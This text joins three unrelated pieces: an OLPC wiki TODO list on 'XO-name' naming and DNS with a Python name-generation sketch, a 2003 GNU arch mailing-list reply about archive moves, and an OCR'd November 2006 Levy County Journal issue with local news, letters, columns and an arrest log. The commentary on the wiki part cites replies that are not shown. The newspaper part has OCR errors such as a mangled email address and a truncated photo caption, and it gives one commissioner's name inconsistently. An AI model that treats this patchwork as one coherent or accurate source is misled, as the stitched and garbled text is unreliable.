TODO

As I understand it (big caveat), this is what needs to be done to implement the Network Principles:

1) get the "XO-name" into Sugar
 - python algorithm for deriving the name
 - identify where it's stored
 - identify how it can be managed
2) run "External DNS" server
 - decide on its TLD
 - run it
 - enable dyndns updates sanely
3) get "XO-name" (dyn)dns updates into distros
4) get "XO-name" dns resolution into distros
5) implement new URI scheme for friends
 - teach Browse about it
 - teach any other interesting apps (gtk text widgets?)
6) get per-XO XMPP presence service into distros

MartinDengler 09:31, 21 October 2009 (UTC)
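TODO item 1 asks for "a python algorithm for deriving the name," and CScott's earlier reply suggests decentralized probabilistic uniqueness via "enough" randomness in the name. A minimal sketch of how that might look, with a birthday-bound check on the collision risk; the name format, 64-bit suffix length, and domain are illustrative assumptions here, not part of the actual proposal:

```python
import math
import secrets

def make_xo_name(nickname: str, random_bits: int = 64,
                 domain: str = "xo.example.org") -> str:
    """Illustrative XO name: a human-readable part plus a random hex
    suffix for decentralized (probabilistic) uniqueness."""
    suffix = secrets.randbits(random_bits)
    return f"{nickname}-{suffix:0{random_bits // 4}x}.{domain}"

def collision_probability(num_hosts: int, random_bits: int) -> float:
    """Birthday-bound estimate that any two of num_hosts independently
    chosen random_bits-bit suffixes collide:
    p ~= 1 - exp(-n*(n-1) / 2**(bits+1))."""
    n = num_hosts
    return 1.0 - math.exp(-n * (n - 1) / 2 ** (random_bits + 1))

# With a 64-bit suffix, even a million laptops collide with
# probability on the order of 1e-8.
print(make_xo_name("ben"))
print(f"{collision_probability(1_000_000, 64):.2e}")
```

How many random bits count as "enough" trades off directly against the memorability and conciseness Daf asks for above, which is exactly the Zooko's-triangle tension already acknowledged in the discussion.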
http://wiki.laptop.org/index.php?title=Talk:Network_principles&oldid=221443
On Mon, Aug 18, 2003 at 06:43:20PM +0100, Bruce Stephens wrote:
> > 4. A lot of documentation talks about people making new repositories
> > each year because old ones get "big"
>
> It's the number of revisions, I suspect.

Actually I think it's meant to address namespace pollution. If you're a good arch user and make branches out the wazoo, you may end up with a lot of dead-end branches, and maybe categories of failed projects, etc. They don't really interfere that much (unless for some reason you want to re-use a branch name or something, and don't like the idea of bumping the version), but do clutter things up, abrowse output, etc.

[As far as I can see, moving to a new archive doesn't affect the way revisions are applied at all; if you don't add some cached versions, it will happily go back to the old archive and apply revisions from there!]

I also think that it may simply be a good habit to at least occasionally move your archive -- it forces you to put in place the tools/whatever to make such a move possible, so if there comes a time when you're _forced_ to move you're in a better position. Some reasons you might be forced to move: (1) your email address changes, so the one in the archive name is bogus (it's just a string, but personally I don't want to publicize an obsolete email address), (2) your old archive becomes too big for any existing disk (you hacker stud!).... :-]

-Miles

--
A zen-buddhist walked into a pizza shop and said, "Make me one with everything."
http://lists.gnu.org/archive/html/gnu-arch-users/2003-08/msg00047.html
LEVY COUNTY JOURNAL - THE COUNTY PAPER SINCE 1923
VOL. 83, NO. 19 | THURSDAY, NOVEMBER 16, 2006 | 1 SECTION: 22 PAGES | 50 cents per copy

City says 'nyet' to police requests

The Colors of Autumn
Save a life -- your own. Quit today. Page 14
Treat Yourself, Page 14

OBITUARIES: Mary Bilbrey, Freddy Davidson III, Shirley Eberle, Margaret Fulmer, Mary Goddard, Annie Grisham, Fannie Holmes, Carla Swails, Bobbe Williams

CONTENTS: Around Levy 2-3, 5, 6, 13; Opinion 4; Law & Courts 5; Levy History 5; Obituaries 7; Sports 8-13; Tides 12; Classifieds 16; Legals 16-17; Land Transactions 17-18; Marketplace 20-21

BY CASSIE JOURNIGAN
STAFF WRITER

CHIEFLAND - Chiefland's police force may soon increase by two if commissioners grant chief Robert Douglas his request. Douglas based his need on "annexation and growth - we have 45 new businesses." He added, "I realize this costs money but to respond quickly, we have to have manpower. The city is now five miles long and two and a half miles wide. We need new officers as soon as we can get them." Projected cost of the two new spots stands at approximately $88,500.
Commissioners also vigorously debated a nuisance ordinance designed to give lawmakers the ability to seize property from repeat offenders. The ordinance would set up a board authorized to impose fines for activities ranging from drug sale to prostitution, criminal street gang activity and stolen property crimes. As the ordinance is now drafted, property can be seized when an offense is repeated twice within a six-month period. Commissioners Teresa Barron, Rollin Hudson and Teal Pomeroy expressed fear that the two-time cut-off could create hardship for innocent victims. "I'd hate to see an elderly person whose grandson is selling drugs without them knowing it have their house taken," Hudson said. Barron opted for leniency. "I'd like to have it more like five than two," she said, referring to the two times in six months. Alice Monyei favored the draft as written. "I say two. They're going to know what this ordinance says," she said, referring to repeat offenders and their knowledge of the nuisance ordinance. "They're going to know they have three, or four more chances." Rollins said, "I'm not for doing something another agency, such as the justice See Police Page 22

Journal photo by Cassie Journigan
PURVEYOR OF FRESH fruits and vegetables April Williams readies her produce for what she hopes will be a bumper crop of customers.

School board considers shortfall

BY CASSIE JOURNIGAN
STAFF WRITER

BRONSON - School board members learned details of a funding shortage during their Nov. 7 meeting. Finance director Bob Clemons said the shortage was due to diminished numbers of students registering this year. He said the district is short 114 students from what was forecast. Funds are expected to have a total shortfall of $612,982. Clemons said he and superintendent Cliff Norris were currently making budget cuts. Clemons said he had requested bids on interest rates to meet the December payroll.
Norris recognized Yankeetown principal Ann Hayes for completion in the principal leadership academy. Several other principals and assistants are currently in training through the program. School board personnel director Candy Dean said salary negotiations recently conducted will result in a 7.54 percent increase. The increase includes an insurance increase that the board is picking up. The increases were approved unanimously after a motion was made by Jennefer Shuster and seconded by Frank Etheridge. See School Page 22

Journal photo by Neal I-Isner
THE WILLISTON Red Devils advanced in the playoffs. The team takes on Eustis Friday. See Page 8 for details.

HOME OF... Torie Hill of Williston

Apartments get first nod

BY CASSIE JOURNIGAN
STAFF WRITER

WILLISTON - Williston is a step closer to being home to a new 30-unit apartment complex. Roswell Development Group is proposing to build the apartments on the corner of SW 1st Avenue and NE 11 Street. Withlacoochee Regional Planning Council member Jason Garcia spoke to city council members during their Nov. 7 meeting and encouraged council to look toward flexible land uses and infill development and then to change the zoning from the current five acres to one and See Housing Page 22

Journal photo by Carolyn Risner
VETERANS WERE saluted across the county Saturday. For more on the weekend's activities, see pages 6 and 15.

REACH US
Managing Editor Carolyn Risner
Phone (352) 490-4462; Fax (352) 400-4490 Chiefland; (352) 486-5042 Bronson
Email edltor@VlewoumarLom
Address: P.O. Box 159, Bronson, FL 32621-0159; P.O. Box 2990, Chiefland, FL 32844-2990

SUBSCRIBE
Levy, Dixie and Gilchrist counties $17; In-state $22; Out of state $27

Locally owned and operated! The Levy County Journal believes in good stewardship of the land. That's why we print on 100 percent recycled newsprint. Protecting our future.
LEVY COUNTY JOURNAL | AROUND LEVY COUNTY | THURSDAY, NOVEMBER 16, 2006

Funds available to cattlemen for drought relief

Florida Agriculture and Consumer Services Commissioner Charles H. Bronson today announced that Florida has been allocated $149,705 in federal funding to implement a Livestock Assistance Grant Program. The funding will assist agricultural producers in their recovery from last spring and summer's drought. "Our department is pleased to work with USDA in this program to help our producers ... program, using the U.S. Drought Monitors from March 7 to Aug. 31, 2006, as the basis for the selection. Any counties that were classified as being in D-3 or D-4 drought during that timeframe were included. The counties are: Bay, Escambia, Holmes, Jackson, Okaloosa, Santa Rosa, Walton and Washington. Commercial farmers or ranchers with beef cattle, farmed bison, dairy cattle, sheep, or goats that suffered forage production losses are eligible for assistance. To receive funding, eligible producers will need to complete a self-certification application that provides the maximum number of eligible livestock that were on site between March 7 and Aug. 31, 2006.

Velvet beans: Crop, not plot

This is not a 21st century Communist plot; it's a crop in early 20th century Levy County. The workers and bean plants pictured above will be in the upcoming book Levy County: Voices From the Past if someone identifies the men. Will any of your family pictures and stories be in the book? Photographs and memories are now being collected. Make sure your memories and those of others in your family will be included. Guidelines may be picked up in any Levy County library. Send your information to Levy Book, P.O. Box 402, Morriston FL 32668 or e-mail them to shp.levybook@yahoo.com. Questions? For answers, e-mail or call Drollene Brown at (352) 465-4862. Don't delay! Deadline is Dec. 15, 2006.
This application also has a section that requires producers to estimate livestock-related expenses incurred because of decreased forage supplies related to the 2006 drought. These expenses could include loss of forage production, costs of supplemental feed, cost of relocating cattle to new feed sources, increased feed transportation costs, and emergency water supply needs. Producers will not receive more relief than their losses. Payments are subject to tax. Producers must complete the application for assistance so that it is received by the Florida Department of Agriculture and Consumer Services by 5 p.m. Jan. 31, 2007, or be postmarked by that date. Applications and other information about the program will be available Dec. 1, 2006, from a number of sources, including:

-- Online at doacs.state.fl.us/ai/ under Announcements, "Livestock Assistance Grant Program."
-- University of Florida IFAS Extension offices located in qualified counties in Florida.
-- Industry organizations: Florida Farm Bureau, Florida Cattlemen's Association, Southeast Milk Incorporated, Florida Dairy Goat Association, Meat Sheep Alliance of Florida, Florida Meat Goat Association.
-- Farm Service Agency offices located in qualified counties in Florida.

Completed applications should be mailed to, and any questions directed to, the Florida Department of Agriculture and Consumer Services at:

Division of Animal Industry
Attn: Livestock Assistance Grant Program
407 South Calhoun Street, Mail Stop M7
Mayo Building, Room 323
Tallahassee, FL 32399-0800
Telephone: (850) 410-0900; Fax: (850) 410-0915

TWO FARM workers surro a

FAVOR hosts first Forever Wild speakers

FAVOR, Friends and Volunteers of Refuges, Lower Suwannee and Cedar Keys NWR present the first in the series of Forever Wild speakers. The speakers, Jennifer Staiger and Jamie Barichivich, will speak on their research on the Lower Suwannee National Wildlife Refuge.
Their goal is to monitor amphibian populations on federal lands and to evaluate potential causes of decline. In response to global declines and threats to the amphibians and reptiles, the US government implemented the National Amphibian Research and Monitoring Research initiative in 2000. Jennifer S. Staiger, who was born and reared in Florida and received her undergraduate degree in environmental studies at Rollins College and a master's degree in wildlife ecology and conservation from UF, along with Jamie Barichivich, who received his degrees in wildlife ecology at UF, have been conducting research on these animals in the Lower Suwannee NWR. The program will be on Nov. 18 at 11 a.m. in the Cedar Key Public Library, 466 2nd St. in Cedar Key. All ages will enjoy this interesting talk on snakes and other reptiles in our area. The meeting is free and open to the public, and coffee and pastries will be served. Call Joan Stephens 352-463-1095 for more information.

Thursday, Nov. 16
- Great American Smokeout, all day
- SRWMD, Mayo, 8:30 a.m.
- History gathering, Williston Library, 10 a.m.
- Transportation board, Williston, 10 a.m.
- Exceptional Parents meeting, Bronson, 6 p.m.
- Ombudsman Council, 12:30

Friday, Nov. 17
- VFW sale, Chiefland, 9 a.m.

Saturday, Nov. 18
- Church yard sale, Bronson, 7:30 a.m.
- Toys for Tots Bike Ride, Chiefland, 10 a.m.
- Craft sale, Crystal River, 9 a.m.
- Thanksgiving dinner, Bronson, 11 a.m.

Tuesday, Nov. 21
- GOP dinner, Yankeetown, 6 p.m.
- Free dinner, Chiefland, 6 p.m.

Friday, Nov. 24
- Quilt show, Chiefland, 8 a.m.

Monday, Nov. 27
- GOP, Chiefland, 6:30 p.m.

Thursday, Nov. 30
- Tourism meeting, Bronson, 6 p.m.
- Music at the library, Williston, 7 p.m.

Saturday, Dec. 9
- Basket auction, Williston, 10 a.m.

Detailed descriptions of these events are contained elsewhere in the Levy County Journal.

Tourism board to meet

The Levy County Tourist Development Council will meet on Thursday, Nov. 30, 2006 at 6 p.m.
at 380 South Court St., Bronson, Florida, in the Levy County Planning and Attorney Conference Room.

VFW Auxiliary plans sale

The Ladies Auxiliary of the VFW is holding a combination craft sale, baked goods and rummage sale on Friday, Nov. 17 and Saturday, Nov. 18 at the VFW Post, 1104 S. Main St., Chiefland beginning at 9 a.m.

Cane grinding at Dudley set

Dudley Farm Historic State Park Annual Cane Grinding Day will be held on Saturday, Dec. 2, from 9 a.m.-2 p.m. It is free admission. For more information, call 352-472-1142.

Page 2

Perkins State Bank Now Offers
- No Minimum Balance Required
- No Monthly Fees
PLUS State of the Art Banking Services
PERKINS STATE BANK
Williston 528-3101 | Chiefland 493-0447 | Inglis 447-4242 | Bronson 486-1182 | Archer 495-9944

Hayes completes Leadership Academy

Ann Hayes, Principal of Yankeetown School, was recognized at the Nov. 7 meeting of the School Board of Levy County for completing the Tier II Principals Leadership Academy. The North East Florida Educational Consortium (NEFEC) established the Principals Leadership Academy to provide professional development for school principals at all levels of experience. The Tier II Academy, funded through the state's DELTA (Developing Educational Leadership for Tomorrow's Achievers) program, focuses on training for experienced principals. Principal Hayes was one of the pilot group of 25 principals selected in July 2005 to participate in the program. "This was a great learning experience. It gave me the opportunity to look at everything from a different perspective. It also gave me the opportunity to meet with other principals and learn from them," said Hayes. Principals who apply for the Academy must submit evidence of effective performance evaluations, and evidence of leadership initiatives in their schools that demonstrate student gains. The district superintendent and staff then review applications.
The superintendent recommends suitable candidates to the NEFEC Board of Directors, which makes the final selection. Training includes topics such as: data analysis and the continuous improvement model; prioritizing, mapping, and monitoring the curriculum; giving leadership to literacy; school vision and culture; and building partnerships for high performance learning. In addition to attending these trainings, participants must also complete a portfolio that demonstrates application of the knowledge gained.
ANN HAYES, principal of Yankeetown School, center, displays the plaque she received in recognition of her completion of the Principals Leadership Academy program. With her are Jennefer Shuster, school board member representing the Inglis/Yankeetown area, and Superintendent Clifton V. Norris.
Commenting on Hayes' "graduation," Superintendent Clifton V. Norris said, "Ann Hayes is an excellent principal, and now, with the skills she has gained through this program, she is going to provide an even higher level of instructional leadership."
Hayes, a resident of Crystal River, has been principal at Yankeetown School for seven years. Previously, she was a teacher/administrative assistant at the school. Her career in education spans 34 years, with 20 years spent in Levy County schools. Asked what she found most challenging about being a principal, she said, "meeting the demands and needs of all the students." And what is most rewarding for her? "The children and the successes."

THURSDAY, NOVEMBER 16, 2006
News Briefs

Exceptional parents to meet Nov. 16
The quarterly meeting of the Levy County Exceptional Student Parent Advisory Council will take place on Thursday, Nov. 16 at the Levy County School Board Room in Bronson from 6-8 p.m. At this meeting, the presenter will be Donita Burke, Levy County's Learning Resource Specialist.

Churches plan Thanksgiving dinners
The Beyond The Walls ministry of Bronson and Elohim Praise, Worship and Deliverance of Chiefland will give away free Thanksgiving dinners on Tuesday, Nov. 21 from 6-9 p.m. Also, 50 boxes of food will be given to needy families. Registration for these boxes will be taken during the time of our celebration and they will be distributed at the close of our celebration. If you would like to help or participate in the music please contact Terrell Burge, Pastor, BCC, at 281-1624. The church is located at 1419 S.W. 2nd Court.

GOP meets Nov. 27
The Levy County Republican Executive Committee (REC) will hold its monthly meeting Monday, Nov. 27, at Bell's Restaurant, Chiefland, starting with fellowship and dutch treat dinner at 6:30. The REC meeting begins at 7:30. The REC website is www.levyrepublican.com. If you have any questions you may contact George at 486-0036.

GOP to hear Scout history
The history of the Girl Scouts, presented by the local troop, will be the program when the Yankeetown-Inglis Republican Club meets at 6 p.m. Tuesday, November 21 at the Inglis-Yankeetown Lions Club on 59th St., Yankeetown. Dinner will be served at 6:30 p.m. and the club is providing the Thanksgiving turkey. Please bring along whatever you would like with your turkey dinner to share. Also bring your table setting. Call Edith at 447-2622 or Scotty at 447-2895.

Quilters covered homeless children's heads
BY WINNELLE HORNE, CORRESPONDENT
Log Cabin Quilters met Nov. 9 at the Levy County Quilt Museum. Today was show day. Martha Asbell has finished a crocheted bedspread and what a beauty. It took her 10 months to make and it goes to her daughter Joann. Alice Mae has finished an umbrella girl quilt top. She has made so many quilts since she started with us in October 1983.
If you have quilts, crafts or what have you please bring them in for us to hang. Be sure you have a tag, at least a 2x3, with your name and price, or not for sale. These tags have to be large enough for people to see, and please use a safety pin, no straight pins or staples. We take care of all the sales. Your tag is put in an envelope with your name on it and at the end of the show, we settle with you. We will also have food each day.
Monday we will be going to St. Francis House with a load of what have you. About 80 stocking caps have been knitted for the homeless children. We have socks, underwear and so much more. Sometimes I say, but for the grace of God that would be me.
We had a chicken dinner, baked potato pie, dressing, soup, okra and tomatoes, rice, salads, coconut pie, apple cake, pound cake, and chocolate cake. We had 20 present.
Winnelle Horne is the director of the Levy County Quilt Museum, Inc.

LEVY COUNTY JOURNAL OPINION THURSDAY, NOVEMBER 16, 2006

YOUR VIEW

Our country needs art
To the editor: With the recent midterm elections, we are all reminded of issues that divide us. I often think of a photograph of the earth taken from space. It reminds me that we all have common denominators from living on the same small planet. Some issues are noncontroversial. Almost everybody wants to breathe clean air and drink clean water. Education for our children. Health. Nourishment. Freedom of speech and religion. Most realize that the future of our small planet rests with our children. One issue that should be noncontroversial is art education in our schools. Art is essential to develop a child into a productive adult.
Art is a universal language. Art satisfies a basic need to create, to express and to demonstrate ideas. Art is a spoke in the wheel of progress. Art satisfies a basic need to create a nurturing environment. Art can express and develop the range of the human experience. Art can express values that are common to the human race. Art is integral in other disciplines such as law, medicine, engineering and history. Art can cross artificial borders and express common themes that all people on our small planet, no matter what language they speak, share. It is inconceivable that our great country doesn't have art education in every school.
David Leach
Main Street Framing and Art Gallery, Chiefland

'We can work together'
To the editor: I have to respond to the allegations made in your Nov. 2 issue by several letter writers regarding the Izaak Walton Investors development plans. I have made many presentations in Yankeetown in an attempt to provide accurate information on the project, and I will continue to do so throughout the permitting process. Armed with the facts, we can work together on a smart plan for redeveloping the riverfront that can help the local economy while preserving and enhancing the quality of life in the community.
Our by-right plans for these properties total about 180 units, as was accurately reported by the Levy County Journal. I have talked to many people in Yankeetown who have come to review the development plans at several open houses and public meetings. I do not believe it is accurate to state that the citizens of Yankeetown are "against this development," or against redevelopment of the waterfront in general. The town council was elected on a platform to defend Yankeetown's zoning, and we've submitted plans that honor that directive. Our project is centered around properties that are commercially zoned, and most are already commercially developed. For the single residential
parcel, our "by-right" plans include low-density construction of eight single-family residences on a five-acre parcel. Our plans include redeveloping the Izaak Walton Restaurant and three existing marinas. The remaining property, site of the Anchorage Boathouse and Preserve, is currently zoned commercial as a "Special Marina District," which allows for a dry rack storage facility.
Regarding the scale of the development, none of the buildings along the Withlacoochee River will be higher than two stories over parking, or about the height of the existing Izaak Walton Restaurant, which most residents will agree is not too high. The dry dock buildings on Cormorant Canal will be slightly higher, and the residential buildings in the Anchorage Boathouse and Preserve will be three stories over parking. Most of the resort residential units will include parking spaces under the buildings, with some additional on-site street parking and off-site valet parking on land near the proposed package plant. The project will include retail stores and a restaurant, and most of our visitors will have no reason to drive anywhere once they arrive at our quiet retreat on the river.
The Yankeetown waterfront has been developed for decades, and our redevelopment project will be constructed to the much higher standards of 21st century environmental regulations. One of the main benefits will be a wastewater treatment "package plant" on the north side of County Road 40 constructed at no cost to the community. Construction of a central sewage system to protect the river from excess nutrients is a long-standing goal of the community. In 1999, the Yankeetown Council voted to include a need for a central sewer system in the local comprehensive plan.
According to town documents, "The need to replace on-site septic systems with a central wastewater treatment plant is self-evident: the potential negative impact of septic tank leachate on the Withlacoochee River, an Outstanding Florida Water, coastal resources in the Gulf of Mexico and groundwater." We agree, and that's why our package plant will be constructed to allow it to tie in to a centralized sewage treatment Continued on page 5

Journalist let subjects tell their stories
One of my heroes died last week. As I watched tributes from his peers in broadcast journalism, I learned he was the hero of many. So often it seems that we as a culture confuse idols with heroes. Idols get lots of press attention these days. Just watch any morning news show to learn the latest on your favorite sports, movie or music star. That latest is usually an embarrassing moment captured by paparazzi and played repeatedly on TV. But stars are not necessarily heroes, in spite of their sometimes breathtaking talent. Stars make more money in a year than we their fans make in a lifetime. When we add up the high cost of tickets to see them, plus the cost of all the ads interrupting every televised moment we watch them, we realize how much we pay them from our hard-earned money. Their riches increase dramatically with each new movie release or season contract. When was the last time your favorite star inspired you to heroic action? I don't think mine ever have. So in spite of my impatience while waiting for the next movie or CD, I can't say my idols have led me to noble actions. Heroes dedicate their lives to helping others lead lives that are safer or happier or more free. I remember my childhood heroes. John Glenn. John Kennedy. Patrick Henry. My father, who went off on exotic voyages thanks to the U.S. Navy, and then returned months later with slides and tales from foreign ports.
I began watching one of the first primetime news magazines in the 1980s. In the early years 60 Minutes brought together the best from the world of investigative journalism. Morley Safer, Mike Wallace, Andy Rooney, Diane Sawyer. All were good. No matter their subject matter, each could hold their listeners spellbound. Ed Bradley was my favorite. It wasn't just the stories he presented, it was his way of interviewing. Whether he interviewed a cultural icon, a political mover and shaker or a man on death row, he accorded all respect. He listened more than he spoke, and when he did speak, he responded directly to what he had heard.
Today I see so many news anchors and reporters jeer at those they are interviewing. They don't give their subject room to talk. They ask jaded questions. They cut off a response for the sake of argument. Or failing to listen, they let good stories slip by as they race down a list of prepared questions. These interviewing techniques have aroused animosity amongst the people. While to me journalism is a noble career, many view journalists as sleazy.
Ed Bradley practiced the fine art of journalism. He shined a light on people's actions and let those he interviewed tell their own stories. He always seemed to capture the essence of his subjects. Our world is a better place today because of Bradley. He showed us how to find the inherent dignity of every human being. We can all hold our heads a little higher because that was how he treated us. I know I will miss him.
Cassie Journigan is a reporter with the Levy County Journal. She may be reached at cjournigan@levyjournal.com

Quote of the Week
A lie can travel halfway around the world while the truth is putting on its shoes. Mark Twain (1835-1910)

Letters to the Editor
1) Letters should be 500 words or less. Letters over the word limit may be edited for space and clarity. Letters longer than 500 words that are difficult to edit may be considered for guest columns.
2) Letters must be signed and bear the signature of the author. Please include a daytime phone number when submitting for consideration.

Staff Writers: Cassie Journigan, Neal Fisher. Sales Representative/Bronson: Laura Catlow. Typesetter: Wilma Jean Asbell. Delivery/Clerical: Rhonda Griffiths.

Miss Honey says
Sunday, Nov. 12, 2006, 6 p.m. Good evening! I went to Sunday morning service and came back home, looked through the Gainesville Sun and fed my little ones. Now they are all asleep and I am surrounded by love, yes puppy love. I feel like I need a nap, too, but if I went to sleep now I wouldn't sleep tonight! I have some very good friends down at the yard sales at the Bronson Motel. Yes, they are lady friends! I baked a cake for them to eat while sitting there yesterday and then Margo and I ate at the Boondocks before we went home. Isn't it great to have friends and be loved? Later, OK?
Here I am again and it's 1 a.m. Monday and I just had a cup of hot chocolate and slipped on a sweater. No, I didn't turn on the heat! But I might soon if it gets too cool. It will soon be just that, because Thanksgiving and Christmas are on their way. Are you ready? Ready or not, it's on its way! Yes, Old Tom Turkey is hiding and St. Nick is packing his bags! Have you been naughty or nice all year so as to be ahead of the game and not be left out? So until next time I'll say Lord fill my mouth with worthwhile stuff and nudge me Lord when I've said enough. Until next week be sweet, take care and God bless.
So says, Miss Honey

Williston did it right
There is an episode of the Andy Griffith Show where the townspeople want to have a band concert in the park for a leisurely Sunday afternoon. But instead of freestyling the afternoon, they waste it by too much planning, too many details.
That episode ran through my mind Saturday evening as I stood in the pavilion at Linear Park in Williston for the Veterans Day celebration. Instead of wasting time looking for bells and whistles, the city put together a remarkable tribute to our nation's heroes, our vets, and the simpleness of the evening stirred the heart. If there were anyone there who did not get a lump in their throat when the high school band played all the themes from Anchors Away to The Marines' Hymn and the veterans stood for their branch, then that person had no heart.
As I watched these veterans ranging from the very young to the very old, I thought of their sacrifice and that of their families. I am a mere 400 miles from my family and can readily access them. Sometimes the distance seems like 4,000 miles. I cannot imagine being the loved one of someone who is actually that far away or farther.
Williston did everything correctly Saturday. The only decor was the American flag. The only uniforms were those worn by veterans and active servicemen. There were no fancy trappings to take away from the moment, and the focus stayed where it should have: on the men and women who are still living and who fought to preserve our freedom of assembly. The music, the speakers, the clear autumn sky were as if they were custom-ordered. It was a Mayberry night in a Florida setting.
The town of Williston and Mayor Gerald Hethcoat are to be commended for taking the initiative to organize the event and for giving up their Saturday evening for those who were willing to give their lives for our country. Saturday I was not only proud to be an American, I was proud of this Levy County city for its patriotism. Thank you. Thank you again.
CAROLYN RISNER

This Week's Arrests
The Williston Police Department reports the following arrests:
A 16-year-old Williston boy charged Oct. 29 with resisting arrest.
Derrick Levon Galloway, 27, of NE 38th Place, charged with driving while license suspended or revoked (habitual violator) and possession of cannabis, less than 20 grams.
The Levy County Sheriff's Office reports the following arrests:
Cory Patrick Robinson, 37, of Archer was arrested for possession of less than 20 grams of marijuana, possession of crack cocaine and possession of ecstasy (MDMA). Bail was set at $42,500.
Al Furnn Woods, 68, of Sanford was arrested for failure to appear (FTA) and driving under the influence (DUI). No bond was set.
Princeo L. Altoidor, 17, of Chiefland was arrested for escape, battery on an officer or firefighter and resisting without violence. Bail was set at $30,000.
Anthony Hart, 17, of Palatka was arrested for escape, smuggling contraband into a facility, criminal mischief and resisting without violence. Bail was set at $10,000.
Alan A. Webb, 19, of Chiefland was arrested for possession of cocaine, possession of less than 20 grams of marijuana and FTA for arraignment. No bond was set. He was also arrested for armed burglary, three counts of grand theft of a firearm and grand theft $300. Bail was set at $15,000.
Shane A. Gray, 35, of Bronson was arrested for FTA, worthless checks. Bond was set at $2,002.
Alden Davis, 53, of Chiefland was arrested for grand theft. Bail was set at $2,500.
Michael S. Nettles, 29, of Trenton was arrested for FTA, possession of marijuana under 20 grams. Bail was set at $600.
Jimmy Charles Ellingham, 47, of Cedar Key was arrested for possession of crack cocaine, possession of drug paraphernalia and FTA-DWLSR. Bail was set at $11,000.
Cynthia Glover Brown, 49, of Chiefland was arrested for sale of cocaine and possession of cocaine. Bail was set at $15,000.
Catina Glover, 48, of Chiefland was arrested for sale of crack cocaine within 1,000 feet of a church and possession of crack cocaine. Bail was set at $15,000.
Charles Lee Coon, 65, of Gainesville was arrested for FTA-DWLS. He was released on his own recognizance.
Jeremy Michael Savacool, 36, of Stuart was arrested for uttering forged bills/checks. Bail was set at $50,013.
Jeanette E. Thompson, 42, of Bronson was arrested for aggravated battery, domestic. Bail was set at $2,500.
James H. Heintzelman, 36, of Williston was arrested for domestic battery. Bail was set at $3,500.
John Theodore Creal, 41, of Bronson was arrested for lewd and lascivious molestation and failure to register as a sex offender. Bail was set at $35,000.
Jonni Hill, 41, of Chiefland was arrested for violation of probation (VOP), exploitation of the elderly. Bail was set at $3,027.78.
Dale Monroe, 39, of Chiefland was arrested for VOP, driving while license suspended or revoked (DWLSR). No bail was set.
Lloyd Staley Ice, 54, of Spring Hill was arrested for VOP, DUI. No bond was set.
Brian Douglas Larkin, 24, of Bronson was arrested for VOP, vehicle theft. No bond was set.

Farm Friends 4-H elects new officers
BY JAMES CORBIN, SPECIAL TO THE JOURNAL
The Farm Friends 4-H Club met Monday, Nov. 6 to elect new officers for the year. Youngsters were excited to participate in the election process. Final results were: President, Kelsi Alexander; Vice President, Justin Hiers; Secretary, Kinsey Ward; Reporter, James Corbin; Chaplain, Emily Smith.
Members of the club each brought in items to fill a basket which will be donated to a special family for the holidays. Students were proud to participate and gave generously, creating a wonderful basket a local family is sure to appreciate and enjoy. While it has not been decided which club member will show the club hog in the Suwannee River Fair, the enthusiasm of having a potential champion was shared by all. Each member is working diligently to prepare their animal or project for a good showing at the fair, and all are looking forward to describing their progress at next month's meeting.
Wreck kills one Sunday
A Fanning Springs man was killed Sunday when the motorcycle he was driving crashed into a light pole and then a parked vehicle. According to the Florida Highway Patrol, Todd L. Harris, 24, was killed near US 19 and SR 26. Witnesses told the FHP that Harris had been driving his 1996 Yamaha erratically through Fanning Springs at approximately 100 mph. The report states that Harris veered his motorcycle off the east edge of the road, traveled along the shoulder for several hundred feet and then skidded sideways. Harris then struck a light pole, continued north and then struck the left side of an unoccupied 1994 Chevrolet pickup that was parked. Harris was transported to Shands UF where he was pronounced dead at 3:56 a.m. This marks the sixth fatal crash in Levy County in 2006.

Bronson UMC plans holiday service
The community is invited to attend. For more information please call Pastor Chacon at 486-2281.

'We can work together,' continued from page 4
... forward to seeing the Izaak Walton Restaurant reopened, which is the first step in our plans. We are ready to renovate the restaurant immediately, but we can't proceed until the town authorizes Levy County to proceed with issuing a building permit. We hope the town council will see the clear public benefit of new investment and the revival of Yankeetown as a destination for visitors. We are embarking on a long process, and I hope everyone will agree that working to achieve a reasonable consensus on redeveloping Yankeetown's working waterfront is a goal that is in the best interests of everyone in the community.
Peter Spittler, Member, Izaak Walton Investors, LLC

Quilter takes exception with definition
To the editor: Re: "If it's quilted on a machine, it's a comforter" by Winnelle Horne. The definition of quilt according to Webster's Dictionary: 'a bed coverlet of two layers of cloth filled with padding (as down or batting) held in place by ties or stitched designs'.
The definition of comforter from the same source: 'a thick bed covering made of two layers of cloth containing a filling (as down).' Therefore, the significant difference between a quilt and a comforter is thickness.
Ms. Horne presents a 'purist' viewpoint about quilts. When sewing machines were first invented, those women who could afford one would piece and quilt (sew the layers together) on their new machines to demonstrate the capabilities of those new sewing machines. Quilters no longer must raise their own cotton, take the seeds out by hand, then comb, spin and weave their own fabric for their quilts. Quilters can simply go to the store and buy machine-made fabric. The same is true regarding quilt making. Piecing can now be done on a sewing machine. Quilting can also be done by machine. The resulting product is still a quilt. I ask the purist: "Where do you get your cotton seed?"
Michel Du Mont, Longarm machine quilter, Trenton (Levy)

LEVY COUNTY HISTORY
107 Years Ago
From the Levy County Clerk of Court Archives and History Dept., Minute Book "H," 1897-1903, p. 185, Meeting of April, 1899
The official bond of John F. Jackson as Justice of the Peace in and for Justices Dist. No. 2 of Levy County in the sum of $500.00 with T. W. Shands & L. B. Lewis as sureties was approved; also the bond of John R. Roberts for carrying a rifle, in the sum of $100.00 with W. J. Epperson and Wms. Nobles as sureties, was approved. On motion, it was ordered that a warrant for $1.48 in favor of Ben Freidman and a warrant for $26.50 in favor of H. I. Sutton be issued against the Fine and Forfeiture Fund to pay bills which were ordered paid at the last meeting of the Board.
From the Archives and History Center, Levy County Clerk's Office, Danny J. Shipp, Clerk of Court

Why Levy County?
I really like the ruralness of it and there is enough here to keep me happy as far as stores and restaurants, etc. I love the peace and quiet, the ability to own horses and livestock, and the people who live here.
I hate crowds and traffic jams and there aren't any of those here! Did I mention that I love the peace and quiet?

Why the newspaper?
Because the help wanted ad was "blind," in that it did not reveal the company name, I had no idea who the employer was when I applied for this job. I have worked for many different kinds of businesses and entities and had lots of office experience, so I applied for the job because of the experience they wanted, and it ended up being this wonderful newspaper.

What role do you feel the Levy County Journal plays in the community?
